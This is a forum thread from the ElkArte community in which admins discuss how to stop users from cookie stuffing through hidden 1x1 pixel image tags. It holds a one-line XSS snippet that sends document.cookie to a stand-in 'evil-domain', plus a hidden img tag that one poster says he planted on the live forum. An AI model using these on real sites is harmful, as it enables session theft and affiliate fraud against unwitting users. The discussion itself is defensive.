Text only | Text with Images

ElkArte Community

Title: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on January 24, 2018, 04:35:37 pm
How can we avoid that users are posting 1x1 pixel wide http links  instead of images,
so that they are not cookie stuffing the forum ?

Cookie Stuffing works this way, that normal http links are posted inside an Image tag
so the browser calls up this link and fetches the Cookie from the destination site and
then no image is displayed and thus they make it only 1 x 1 pixel big, so that it does not
look suspicious...

How can this be stopped, also in [img] tag and in avatars loaded from external sites ?
Many thanks.
Title: Re: something
Post by: emanuele on January 24, 2018, 06:02:10 pm
How can we avoid that users hijack each and every topic?
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Feline on January 30, 2018, 03:52:51 pm
Never  :( but .. 2fa login/register helps a little bit   ;)

Fel

Title: Re: Cookie Stuffing - how to avoid it.
Post by: Feline on January 30, 2018, 03:55:40 pm
Quote from: hartiberlin – Cookie Stuffing works this way, that normal http links are posted inside an Image tag ...
Step 1 .. use https
Step 2 .. set cookies to secure and https
Step 3 .. use 2FA login / register

That will helps a little bit  ;)


Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on February 01, 2018, 02:15:19 pm
Hmm, how does the 2 Factor Authentication can stop this ?
This is only for the login of the member, but he could still be posting
http links inside an image [img] tag, right ?
Title: Re: Cookie Stuffing - how to avoid it.
Post by: emanuele on February 01, 2018, 05:11:10 pm
I may be terribly wrong, but as far as I know, unless a bug in the browser, an embedded image cannot sniff the cookies because they reside on two different domains and cookies are domain specific.
You need at least to be able to run javascript to sniff the session data, embedded images are generally not enough from what I know.
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Feline on February 02, 2018, 09:30:54 pm
Also you can disable images in the posts .. (simple disable the BBC img tag in the settings).
If a user will add a image, he can upload it and insert this as attach. So this image is local stored.
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Feline on February 02, 2018, 09:34:17 pm
Quote from: hartiberlin – Hmm, how does the 2 Factor Authentication can stop this ?
That do not stops any criminal activity .. but .. I think, that such users do not have a accout they can handle 2FA  ;)
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Frenzie on February 05, 2018, 07:14:21 am
One way could be to use the Image Cache/Proxy https://www.elkarte.net/community/index.php?topic=3432.msg32243#msg32243
Title: Re: Cookie Stuffing - how to avoid it.
Post by: emanuele on February 05, 2018, 04:30:51 pm
You meam a way to mitigate a problem that doesn't exist, or you mean the cache proxy could be exploited to send cookie data back?
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Frenzie on February 07, 2018, 10:50:58 am
Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains (https://en.wikipedia.org/wiki/Cookie_stuffing) it thus:

QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.

I don't know if this is actually something to worry about, but all you have to do to test it is to copy the php setcookie() example (https://secure.php.net/manual/en/function.setcookie.php) into a PHP file, stick <img src="the-different-domain-with-setcookie.php"> in an HTML file, load it, and check if the cookie exists on the-different-domain. Unless you've disabled third-party cookies, it will.

You're talking about something like XSS session hijacking, which is completely unrelated except in the sense that you could use image.src = evil-domain + document.cookie in a script to do it. To prevent that in case of script injection, use HttpOnly, preferably combined with HTTPS. But like I said, that's off topic. This is about tracking cookies.

Edit:
Quoting what I wrote above:
QuoteUnless you've disabled third-party cookies, it will.
Of course you'll need to add an image mimetype and some image data if you want to display an actual 1x1 px image as opposed to a nice broken image icon. Presumably a transparent GIF would be your best bet. My point was that you can perform the basic proof of concept in seconds.

Edit 2: fully worked out example here (https://www.willmaster.com/library/cookies/setting-a-cookie-on-a-remote-domain.php), including a full description of the problem (described as an opportunity). Of course not everything applies because our forum won't request resources other than the one specific image from the server:

Quote Once the third-party cookie system is in place, it can be made to do something useful. For example:

When the third-party cookie is set any content can be sent to the web page with appropriate HTML tags. Image, JavaScript, Flash, HTML ads, anything that can be published on a web page. [The ad thing might apply, but in that case the actual ads would already be doing the tracking cookie job in the first place.]

The cookie setting can be logged, along with any other information available at the time, including referring web page and domain, and including any other information the HTML tag provided. [This obviously applies.]

Date and time can be recorded. Ad identification can be recorded. [Sure.]

Cookies previously set can be read and the cookie's value adjusted. [Yup.]

There are ways to work around third-party cookie restrictions some browsers make available to their users. [Not without participation from both domains.]

The limit of what can be done may be determined by the limit of what can be imagined. [Not to worry about that one; again not without participation from all domains involved.]
Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on February 12, 2018, 10:58:13 am
Quote from: Frenzie – Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains (https://en.wikipedia.org/wiki/Cookie_stuffing) it thus:

QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.


Yes, I meant this regarding affiliate cookies stuffing, e.g. Amzon or Ebay or Clickbank cookies for instance...
Hiding them in an Image Tag can set them in the userĀ“s browser although he never visited Amazon for instance..
Then when he visits himself Amazon and makes a purchase, the Cookie Stuffer gets the commission for the sale...
I want to prevent this being done by users in my forum.
Many thanks.
Regards, Stefan.
Title: Re: Cookie Stuffing - how to avoid it.
Post by: emanuele on February 17, 2018, 03:13:53 am
Sorry, I thought it was a typo.
You get pretty nasty users there.
Disable any embedding and you are safe.
Enable https and image cache and you should be safe.
Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on June 01, 2018, 11:51:06 am
Well Elkarte.net is also vulnerable to cookie stuffing.

I just tested it and it went through.
See:
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525

Mark all the text there in this posting and rightlick in Firefox
and click "Show Sourcecode of marked selection."

There you wil see the img src tag with a https link just to google.de
and nobody knows, that it is there...
This way you can also set Affiliate cookies without anybody knowing...
So the admins here should better deactivate this function on Elkarte.net !
Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on June 01, 2018, 11:54:41 am
Code: [Select]
<img src="https://google.de" alt="" style="width: 100%; max-width: 20px; max-height: 1px; cursor: pointer;" class="bbc_img resized">


The mentioned posting
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525 (https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525)
now contains this and this way a Cookie from Google will be set into your browser...
Title: Re: Cookie Stuffing - how to avoid it.
Post by: emanuele on June 01, 2018, 05:15:09 pm
Quote from: hartiberlin – So the admins here should better deactivate this function on Elkarte.net !
No.
If you don't want cookies from 3rd parties, your browser has the excellent feature to block cookies from 3rd parties (and if it doesn't have and you are so concerned about stuffing then you should really use another browser) that is the most efficient way to block unwanted content, even more than GDPR, even more than ask a single website to block something that you'll get from almost any website you visit in a day. ;)
Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on June 01, 2018, 06:08:19 pm
Only bad for the admin if he relies on Affiliate income and some other users steal it via Cookie stuffing...
so I always disable the image tags.. so nobody can cookie stuff the other users...
Title: Re: Cookie Stuffing - how to avoid it.
Post by: emanuele on June 02, 2018, 08:11:50 am
Well, then you have your answer.
Honestly, rely on cookies for incomes is as reliable as random guess because cookies are for sure not a way to control users (or at least not a reliable one since are client-side).
Title: Re: Cookie Stuffing - how to avoid it.
Post by: hartiberlin on June 02, 2018, 09:05:53 am
Many affiliate Programs on the Internet work this way, especially Amazon und Ebay...
which are widely used...so it can hurt extremely the Admin of a forum, if he needs to make money from the
Affiliate integrations of his forum, when blackhat users set their own Amazon or Ebay cookie this way and steal
the commissions from the Admin of the forum...

So I would advise all forum admins to disable Image Tags...Also you can link then via it to Malware which is then
executed...not too funny...
Title: Re: Cookie Stuffing - how to avoid it.
Post by: badmonkey on June 02, 2018, 09:49:31 am
Has this actually happened to you? I am truly curious. 
Title: Re: Cookie Stuffing - how to avoid it.
Post by: Spuds on June 02, 2018, 01:47:27 pm
Perhaps using an image proxy for all images would fix that as everything would be served from your domain?  Just a thought.
Title: Re: Cookie Stuffing - how to avoid it.
Post by: radu81 on June 02, 2018, 08:15:21 pm
Quote from: Spuds – Perhaps using an image proxy for all images would fix that as everything would be served from your domain?  Just a thought.

which is already included into Image Cache add-on, there is an option: Cache all [img]'s, not just ones needed for HTTPS sites.
Text only | Text with Images